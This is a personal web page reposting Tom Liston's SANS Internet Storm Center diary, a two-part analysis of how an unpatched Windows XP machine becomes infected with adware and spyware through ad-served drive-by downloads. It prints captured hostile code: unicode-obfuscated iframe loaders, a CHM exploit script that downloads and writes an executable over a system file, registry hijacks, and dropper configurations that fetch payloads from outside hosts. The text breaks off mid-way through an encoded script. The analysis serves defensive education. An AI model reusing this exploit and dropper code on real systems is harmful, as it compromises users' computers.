O
Scott Gillis, N3UJJ Banner
Home  |  Resume  |  Services  |  Internet Security  |  Software  |  Links  | Amateur Radio  |  WarDiving  |  Personal
Current location of all my vehicles
The N3UJJ Weather Station


Internet Storm Center Infocon Status

One of the most successful series of the Internet Storm Center


At least read the first 3 paragraphs (then you will know why you need to read the whole thing)

Tom Liston´s Following the Bouncing Malware - Part I:


On July 20th, after investigating some adware/spyware/malarial that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.

Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.

To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.

Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.

In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."

Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.

After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then clicked on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).

yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companys then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.

In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogames website results in a flurry of HTTP activity, including the following

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Which results in the following HTML:

-----------------------------------------------------------------------------------------------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html" width=468 height=60 hspace=0 vspace=0
frameborder=0 marginheight=0 marginwidth=0 scrolling=no> <a href="http://205.236.189.58/mynet/mynet-MML.html"
target="_blank"><img width=468 height=60 src="http://205.236.189.58/mynet/mynet-MML.html" border=0></a></iframe>
<div id="beacon_459" style="position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&amp;clientid=431&amp;zoneid=450&amp;source=&amp;
block=86400&amp;capping=3&amp;cb=7da741942b0623acd85070683ffa3ad8' width='0' height='0' alt='' style='width: 0px;
height: 0px;'></div>
</body>
</html>
-----------------------------------------------------------------------------------------------------------

This results in the following HTTP GET:
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"
-----------------------------------------------------------------------------------------------------------
And the following HTML gets downloaded:
<a href="http://www.lovemynet.com/?frombanner2" target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
-----------------------------------------------------------------------------------------------------------

Looks like someone is trying to hide something... This decodes to:
<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>
-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"
Which gives us:
-----------------------------------------------------------------------------------------------------------
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>

-----------------------------------------------------------------------------------------------------------

Which decodes to:
<textarea id="code" style="display:none;">
<object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm"
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
</script>

-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"

Within this chm exploit, we find the following hp2.htm file:

-----------------------------------------------------------------------------------------------------------
<script language="vbscript">
Function Exists(filename)
On Error Resume Next
LoadPicture(filename)
Exists = Err.Number = 481
End Function
</script>
<script language="javascript">
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML =
"<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
wmplayerpaths= [
"C:\\Programmer\\Windows Media Player\\wmplayer.exe",
"C:\\Program\\Windows Media Player\\wmplayer.exe",
"C:\\Programme\\Windows Media Player\\wmplayer.exe",
"C:\\Programmi\\Windows Media Player\\wmplayer.exe",
"C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
"C:\\Programas\\Windows Media Player\\wmplayer.exe",
"C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
"C:\\Program Files\\Windows Media Player\\wmplayer.exe"
];
for (i=0;i<wmplayerpaths.length;i++) {
wmplayerpath = wmplayerpaths[i];
if (Exists(wmplayerpath))
break;
}
function getPath(url) {
start = url.indexOf('http:')
end = url.indexOf('HP2.CHM')
return url.substring(start, end);
}
payloadURL = getPath(location.href)+'hp2.exe';
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(wmplayerpath,2);
var win=null;
function NewWindow(mypage,myname,w,h,scroll,pos){
if(pos=="random"){
LeftPosition=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;
TopPosition=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;
}
if(pos=="center"){
LeftPosition=(screen.width)?(screen.width-w)/2:100;
TopPosition=(screen.height)?(screen.height-h)/2:100;
}
else if((pos!="center" && pos!="random") || pos==null){
LeftPosition=0;TopPosition=20
}
settings='width='+w+',height='+h+',top='
+TopPosition+',left='+LeftPosition
+',scrollbars='+scroll
+',location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no';
win=window.open(mypage,myname,settings);
}
location.href = "mms://";
</script>

-----------------------------------------------------------------------------------------------------------

Following along...
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"

-----------------------------------------------------------------------------------------------------------
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
</script>
<script language=javascript>
self.close()
</script>
</html>

-----------------------------------------------------------------------------------------------------------

Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:

[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"

hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact www.totalvelocity.com/Bundling/tvmupdater4bp5.exe, which installs/updates the "TV Media Display" spyware.

At this point, I followed one link on the site, that required I have Flash installed. Since I didn't have Flash installed, I went "back". But because I now had cookies placed on my computer from my original visit to the site, one of yahoogamez' files, popup.js, does something differently:

Now, this code within popup.js is executed:

-----------------------------------------------------------------------------------------------------------
if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
var expdate = new Date((new Date()).getTime() + 1800000);
document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
document.write("<script language=\"JavaScript\"
src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
}
-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"
-----------------------------------------------------------------------------------------------------------
var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
function retry() {
if(retry_cnt>0) {
alert("To install latest AT- Games update, please click Yes");
start_download();
retry_cnt--;
} else {
//alert("This is a 1 time install, once you click Open it will never pop up this message again");
//downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
}
}
function start_download()
{
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' ){
//alert("Sorry, your browser is not WIN32 Compatible");
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2){
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab"
HEIGHT=0 WIDTH=0></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
}
else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
//trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
start_download();
-----------------------------------------------------------------------------------------------------------

[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

This cab file contains two files:

ATPartners.inf - 403 bytes
ATPartnets.dll - 96,256 bytes

The .dll file is identified by AV software as Win32/TrojanDownloader.Rameh.C trojan

And that's were I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on it's merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.

-------------------------------------------------------------

 
Tom Liston´s Following the Bouncing Malware -  Part II

Note: The links in this part of the diary are purposely not clickable. DO NOT GO TO THESE SITES. THIS MEANS YOU. REALLY.
Welcome back to Part II of our journey through the seamier side of the internet. To those of you who wrote in asking, I’m sorry it took so long to get this put together and up...
In case you missed Part I, or in case you simply want to review, here's a link to where we started:
http://isc.sans.org/diary.php?date=2004-07-23
Go on... I’ll wait.
Ready? Good.
When we last left our intrepid "Joe Average" computer user, he had just installed Windows XP Home Edition, and gone out on the Internet in search of some fun and adventure. If you recall, someone had told him about Yahoo! Games and he wanted to try them out. Using Google, and ignoring (for whatever reason) several obvious links to Yahoo!, he scrolled down near the bottom of the first Google search page and clicked on a link leading to www.yahoogamez.com.
That's when the fun began.
With an IFRAME here and a CHM exploit there, Joe Average’s shiny new computer was transformed into something new... something Joe never dreamed it would become: an S.E.P.
"Somebody Else’s PC."
Huh?
Well, although Joe still owns (letter "o") the hardware, and gets the privilege of supplying it with electricity and an internet connection, someone else now 0wns (zero) his computer, and they’re making all of Joe's bright and shiny hardware dance to a tune that THEY’RE playing.
You see: All Joe wants his hardware to do is stop all of this nonsense and leave him in peace to play a rousing round of "Donut Boy 2" from the yahoogamez site. But the new happy-go-lucky pals that he's picked up while browsing have some other things in mind...
When I paused our adventure at the end of Part I, the list of "stuff" done to Joe's computer looked like this:
1) Joe's homepage had been changed. It is now set to:
http://default-homepage-network.com/start.cgi?new-hkcu
2) The default search page has been set to:
http://server224.smartbotpro.net/7search/?new-hkcu
3) Search assist has been turned off.
4) "TV Media Display" has been installed on Joe's machine (more on this later.)
5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.
So... what do Joe Average's new found buddies have planned for him next? Let's find out together as we continue to follow the bouncing malware.
Let's start by taking a look inside the file that Addictive Technologies "gave" to Joe. If you’ll recall, it was a .cab file called "fr03tp.cab," containing two files:
ATPartners.inf – 403 bytes
ATPartners.dll – 96,256 bytes
(Some editorializing: The ATPartners.dll contains a statically linked copy of the MSVC runtime. This is completely unnecessary. Addictive Technologies: If you're going to write malware, at least write EFFICIENT malware.)
Looking at the strings contained within the .dll file, we find some interesting stuff:
/F1/Cmd4F1_fr03t.txt
www.f1organizer.com
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
And some downright bizarre stuff:
Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!
(Would anyone care to enlighten me?)
Putting some obvious "stuff" from that list together, we get ourselves a URL:
http://www.f1organizer.com/F1/Cmd4F1_fr03t.txt
where we find the following interesting message:
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF2]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7551
Name=Big Fish Games

[AddF3]
Folder=AT-Games
Link=http://www.regnow.com/softsell/visitor.cgi?affiliate=24998&action=site&vendor=7834
Name=FlyorDie Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/ezbdlLs.dll
InstallName1=bdlds.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm
(Is it just me, or did anyone else find the term "softsell" in the above "RegNow" URLs more than a bit amusing?)
Hey look! More stuff was "updated" on Joe's computer: Let's see... They're adding some stuff to Joe's Internet "Favorites" to advertise purchase links for games that AT gets affiliate bucks for (Gamehouse Games, Big Fish Games, and FlyorDie Games), they've added a link on Joe's Desktop to "007arcadegames," and they're downloading more gifts for Joe: ezbdlLs.dll and SplWbr.dll.
SplWbr.dll weighs in at a whopping 454,656 bytes and is what is known in the AntiVirus biz as a "file dropper." That is, when it is executed, it writes out and installs or executes one or more files that are attached to it as data. In this case, it drops out two files:
Drop#1 – 135,088 bytes which claims to be "Ad Destroyer and Virtual Bouncer Installation" and is digitally signed by Spyware Labs, Inc. (www.spywarelabs.com).
Drop#2 – 302,544 bytes which silently installs "TopRebates.com AutoTrack software" (www.toprebates.com).
ezbdlLs.dll is a 151,040 byte UPX compressed .dll that expands to 176,128 bytes when uncompressed. It too is a file dropper, gracing Joe's machine with three new gifts:
Drop#1 – 65,536 bytes of ASPacked goodness from www.abetterinternet.com which claims to be a "[u]tility for downloading files and upgrading software. Visit www.abetterinternet.com for more info."
Drop#2 – 33,280 bytes of UPX packed fun which expands into 65,536 bytes of crappy software engineering from the fine folks at ezULA (www.ezula.com) who’s stated goal is "Making Your Internet Browsing Simple, Exciting, and Personal." Uh... no thank you.
Drop#3 – 65,024 bytes filled with a NullSoft Installer that gifts Joe's machine with SAHAgent, a Winsock2 Layered Service Provider (LSP) that installs itself in Joe's WinSock stack, much like a personal firewall. SAHAgent redirects select web traffic to cause online purchases made by Joe to be done in a way that will route any affiliate bucks to a specific affiliate ID.
So, what's the upshot of this whole mess? Well, Joe has had five new software packages installed onto his machine, redirecting his browsing, his searching, and his online purchases to suit the desires of the (no-doubt ;-) fine, upstanding people at ATPartners. His Internet browsing will now be "Simple, Exciting, and Personal" (ezula), he’ll always know that "The Best Downloads are Free" (abetterinternet), his computer will show him the "Smart way to put money in your pocket" (TopRebates) and he needn’t worry about adware/spyware any more because Virtual Bouncer has been installed to... uh... bounce it (Spyware Labs). Oh, and his online purchases will earn money for... uh... um.... someone. (SAHAgent). Joe should be so very, very happy.
But did you happen to notice THIS section in the text-file o' instructions that the ATPartners.dll downloaded?
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt
Next time around, we’re going to download a DIFFERENT set of "configuration" instructions:
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.f1organizer.com
Object2=/F1/objects/ezbdlLs.dll
InstallName2=bdlds.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server3=www.f1organizer.com
Object3=/F1/objects/W2020Setup.dll
InstallName3=W2020Setup.dll
RepURL3=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server4=www.f1organizer.com
Object4=/F1/objects/MyDailyHoroscope.dll
InstallName4=MyDailyHoroscope.dll
RepURL4=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm

Server-6=www.f1organizer.com
Object-6=/F1/objects/MoreResultsSetup.dll
InstallName-6=MoreResultsSetup.dll
RepURL-6=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-3=www.f1organizer.com
Object-3=/F1/objects/KVIF_11.dll
InstallName-3=KVIF_11.dll
RepURL-3=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_KVI.htm
Just looking at that list makes me tired. (And the name "ezStD" makes me laugh… For those non-English speakers out there, STD is an acronym for "Sexually Transmitted Disease" :-) I could slog down through the whole sorry mess, and perhaps I will if there is enough interest, but for now let's take a look at another area where Joe is no longer the 0wner of his P.C.: his homepage.
Joe's homepage was changed in the initial "drive-by" to be "http://default-homepage-network.com/start.cgi?new-hkcu". The next time that Joe fires up IE, here’s what he gets (suitably edited to remove superfluous crud):
<html><head>
<title>Default Homepage Network</title>
</head>
<body>
[script language=javascript]
<!--
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);

if (!is_aol) {
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
}
location.href="http://default-homepage-network.com/newspynotice.html"
if (!is_aol) {
var expdate = new Date((new Date()).getTime() + 600000);
if (document.cookie.indexOf("delayed") == -1) {
document.cookie=
"delayed=general; expires=" + expdate.toGMTString() + "; path=/;";
splashWin2 = window.open("",'y','fullscreen=1,toolbar=0,location=0,\
directories=0,status=0,menubar=0,scrollbars=0,resizable=0');
splashWin2.blur();
window.focus();
splashWin2.resizeTo(10,10);
splashWin2.moveTo(5000,5000);
splashWin2.location="http://object.passthison.com/aff/delayed/";
window.focus();
}
}
//-->
[/script]</body>
The referenced file, "newspynotice.html," is another rather interesting little gem. It displays a big red stop sign, and explains that poor Joe’s computer may be infected with spyware. Has Joe noticed that his home page has been changed? (Well, duh!) Has his computer been acting "wierd" lately? (Why can’t these malware clowns spell?) Is the Internet "running slow or crashing?" If so, Joe simply needs to click on a link on the page and his "computer will be back to normal and secure again in just a few minutes." Oh, joy... oh, joy. But, hidden within the HTML of this “IMPORTANT SECURITY NOTICE!” page is a little surprise:
<!-- 1. newobj1 -->

[script type="text/javascript"]document.write('\u003c\u0073\u0063\u0072\u0069\u0070
\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a
\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a
\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070\u0020\u003d
\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061
\u0074\u0065\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u003b\u000d\u000a
\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0068\u006f
\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d
\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0064\u006f\u0063
\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0069
\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022
\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061
\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006f\u0062\u006a\u0065
\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068\u0069\u0073\u006f
\u006e\u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030
\u0030\u0033\u002f\u006e\u0065\u0077\u006f\u0062\u006a\u0065\u0063\u0074
\u0031\u002e\u0063\u0067\u0069\u003e\u0022\u003b\u000d\u000a\u0009\u006f
\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028\u0030
\u002c\u0030\u002c\u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d
\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u0029\u003b\u000d\u000a
\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070
\u0028\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070
\u0074\u003e')[/script]

<!-- 2. e1 -->

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072\u0061\u006d
\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a
\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e\u0031\u0033\u0039\u002e
\u0036\u0031\u002f\u0068\u0070\u0031\u002f\u0068\u0070\u0031\u002e\u0068
\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f\u0069
\u0066\u0072\u0061\u006d\u0065\u003e')[/script]
A little decoding gives us Part 1:
[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object\
data=http://object.passthison.com/vu083003/newobject1.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup();
[/script]
And Part 2:
[iframe src="http://69.50.139.61/hp1/hp1.htm" width=1 height=1][/iframe]
This recalls the hp2.htm file that was downloaded and installed in Part I of this epic adventure. Same site, same method, same result:
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

[script type="text/javascript"]document.write('\u003c\u0074\u0065\u0078\u0074\u0061
\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065
\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073
\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e
\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063
\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030
\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c
\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041
\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a
\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074
\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d
\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c
\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f
\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d
\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e
\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073
\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020
\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072
